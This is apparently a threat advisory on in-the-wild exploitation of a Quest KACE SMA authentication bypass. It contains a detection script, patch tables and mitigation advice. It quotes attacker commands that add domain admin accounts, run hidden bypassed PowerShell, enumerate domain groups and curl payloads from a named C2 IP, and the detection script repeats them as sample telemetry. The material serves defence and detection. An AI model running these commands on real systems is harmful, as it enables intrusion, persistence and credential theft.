CVE-2025-32975
Starting the week of March 9, 2026, Arctic Wolf observed malicious activity in customer environments potentially linked to the exploitation of CVE-2025-32975 on unpatched Quest KACE Systems Management Appliance (SMA) instances that were publicly exposed to the internet. This vulnerability was patched in May 2025. Quest KACE SMA is an on-premises appliance for centralized endpoint management, providing inventory, software deployment, patching, and endpoint monitoring capabilities.
CVE-2025-32975 is a critical authentication bypass vulnerability that allows threat actors to impersonate legitimate users without valid credentials. The flaw exists in the SSO authentication handling mechanism and can result in complete administrative takeover.
Arctic Wolf is not aware of any prior public reports of exploitation of CVE-2025-32975 and has not identified a publicly available proof-of-concept. Additionally, we found no evidence that the related vulnerabilities (CVE-2025-32976, CVE-2025-32977, and CVE-2025-32978), which were patched alongside CVE-2025-32975 in May 2025, were leveraged in this activity.
Technical Details
Initial access is suspected to have occurred via CVE-2025-32975, since the threat actors achieved administrative takeover of the appliance shortly afterward. Observed activity included the following:
Execution / Initial Access
- Exploited KPluginRunProcess functionality in KACE to execute remote commands.
- Analysis of KACE logs revealed Base64-encoded payloads.
- Downloaded files via curl from 216[.]126[.]225[.]156 to establish command-and-control communication.
Persistence
- Created additional administrative accounts via runkbot.exe (Quest KACE process) and attempted to add them to administrative groups:
  - net localgroup administrators ooo1 /add
  - net group "domain admins" ooo2 /add
- Executed PowerShell scripts in a bypassed and hidden context:
  - powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\temp\Enable-UpdateServices.ps1"
- Registry modifications via taskband.ps1 for potential persistence or system configuration changes.
Credential Access
- Credential harvesting using Mimikatz, including one instance disguised as asd.exe.
Discovery
- Local system enumeration:
  - quser.exe - enumerate logged-in users
  - net localgroup administrators - list admin accounts
  - net user - enumerate all user accounts
- Domain administrative structure enumeration:
  - net group "domain admins" /domain > c:\1.txt
  - net group "domain controllers" /domain >> c:\1.txt
- Network and domain discovery:
  - net time /domain > c:\1.txt
  - net group "domain controllers" /domain
Lateral Movement
- Gained RDP access to backup infrastructure (Veeam, Veritas) and domain controllers.
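The observed commands above translate directly into hunt logic. The following Python script is an added example, not part of Arctic Wolf's advisory or of any Quest KACE component: it runs a handful of rules derived from the reported activity over constructed process-creation telemetry. The `parent=... image=... cmdline=...` line format, the field names, the file and account names in the sample lines, the two benign control lines, and the abbreviated `-ep`/`-w` PowerShell spellings are assumptions made for illustration; only the download source IP, the process names and the command-line patterns come from the advisory.

```python
import re
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple

# Download source named in the advisory (written defanged in the text above).
C2_HOST = "216.126.225.156"


@dataclass
class ProcEvent:
    parent: str   # parent image path
    image: str    # child image path
    cmdline: str  # child command line


# Constructed line format resembling Sysmon Event ID 1 / EDR process telemetry
# (assumption; not a KACE or Arctic Wolf log format).
LINE_RE = re.compile(r"parent=(.+?)\s+image=(.+?)\s+cmdline=(.*)$")


def parse_line(line: str) -> ProcEvent:
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unparseable line: {line!r}")
    return ProcEvent(*m.groups())


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def kace_spawned_group_add(e: ProcEvent) -> bool:
    # runkbot.exe (KACE agent process) spawning net.exe to add an account to a group.
    return (basename(e.parent) == "runkbot.exe"
            and basename(e.image) in ("net.exe", "net1.exe")
            and re.search(r"\b(localgroup|group)\b.*\s/add\b", e.cmdline, re.I) is not None)


def hidden_bypass_powershell(e: ProcEvent) -> bool:
    # Both -ExecutionPolicy Bypass and -WindowStyle Hidden; the short forms
    # -ep / -w are PowerShell's partial-parameter spellings (a generalisation).
    return (basename(e.image) in ("powershell.exe", "pwsh.exe")
            and re.search(r"-(executionpolicy|ep)\s+bypass", e.cmdline, re.I) is not None
            and re.search(r"-(windowstyle|w)\s+hidden", e.cmdline, re.I) is not None)


def curl_from_c2(e: ProcEvent) -> bool:
    return basename(e.image) == "curl.exe" and C2_HOST in e.cmdline


def staged_domain_enum(e: ProcEvent) -> bool:
    # "net group ... /domain > c:\1.txt" style: domain discovery redirected to a file.
    return re.search(r"\bnet\s+(group|time)\b.*?/domain\b.*?>{1,2}\s*\S+", e.cmdline, re.I) is not None


RULES: List[Tuple[str, str, Callable[[ProcEvent], bool]]] = [
    ("kace_spawned_group_add", "high", kace_spawned_group_add),
    ("hidden_bypass_powershell", "medium", hidden_bypass_powershell),
    ("curl_from_known_c2", "high", curl_from_c2),
    ("staged_domain_enum", "medium", staged_domain_enum),
]


def hunt(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (rule, severity, cmdline) for every rule that fires on every line."""
    hits = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        event = parse_line(raw)
        for name, severity, predicate in RULES:
            if predicate(event):
                hits.append((name, severity, event.cmdline))
    return hits


def max_severity(hits: List[Tuple[str, str, str]]) -> Optional[str]:
    order = {"low": 0, "medium": 1, "high": 2}
    return max((h[1] for h in hits), key=order.__getitem__, default=None)


# Constructed sample telemetry: five lines modelled on the advisory's commands,
# followed by two benign control lines (an interactive admin listing and a
# normal KACE-driven software install) that must not fire.
SAMPLE_LOG = r"""
parent=C:\Program Files (x86)\Quest\KACE\runkbot.exe image=C:\Windows\System32\net.exe cmdline=net localgroup administrators ooo1 /add
parent=C:\Program Files (x86)\Quest\KACE\runkbot.exe image=C:\Windows\System32\net.exe cmdline=net group "domain admins" ooo2 /add
parent=C:\Program Files (x86)\Quest\KACE\runkbot.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline=powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\temp\Enable-UpdateServices.ps1"
parent=C:\Windows\System32\cmd.exe image=C:\Windows\System32\curl.exe cmdline=curl -o C:\temp\update.bin http://216.126.225.156/update.bin
parent=C:\Windows\System32\cmd.exe image=C:\Windows\System32\cmd.exe cmdline=cmd.exe /c net group "domain admins" /domain > c:\1.txt
parent=C:\Windows\explorer.exe image=C:\Windows\System32\net.exe cmdline=net localgroup administrators
parent=C:\Program Files (x86)\Quest\KACE\runkbot.exe image=C:\Windows\System32\msiexec.exe cmdline=msiexec /i C:\temp\agent.msi /qn
""".splitlines()


if __name__ == "__main__":
    for rule, severity, cmdline in hunt(SAMPLE_LOG):
        print(f"[{severity:6}] {rule:26} {cmdline}")
```

The rules deliberately key on behaviour rather than file names: the renamed Mimikatz (asd.exe) in the advisory shows why a filename match is not worth writing, and the local enumeration commands (quser, net user) are too common to alert on alone, so neither appears here. Run the rules over real telemetry and treat any `high` hit on a host that also has KACE agent activity as a reason to pull the appliance's own logs for the Base64-encoded KPluginRunProcess payloads mentioned above.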
Recommendations for CVE-2025-32975
Upgrade to Latest Fixed Version
Arctic Wolf strongly recommends that customers upgrade to the latest fixed version.
| Product | Affected Version | Fixed Version |
| --- | --- | --- |
| Quest KACE SMA | 13.0.x before 13.0.385 | 13.0.385 or later |
| Quest KACE SMA | 13.1.x before 13.1.81 | 13.1.81 or later |
| Quest KACE SMA | 13.2.x before 13.2.183 | 13.2.183 or later |
| Quest KACE SMA | 14.0.x before 14.0.341 (Patch 5) | 14.0.341 (Patch 5) or later |
| Quest KACE SMA | 14.1.x before 14.1.101 (Patch 4) | 14.1.101 (Patch 4) or later |
Please follow your organization’s patching and testing guidelines to minimize potential operational impact.
Remove Publicly Exposed Instances of KACE SMA From the Internet
Arctic Wolf strongly recommends that KACE SMA instances not be exposed to the public internet. If remote access is required, it should be restricted through a VPN or firewall.
As a security best practice, we advise keeping these types of products, including those from other vendors, non-internet-facing unless absolutely necessary.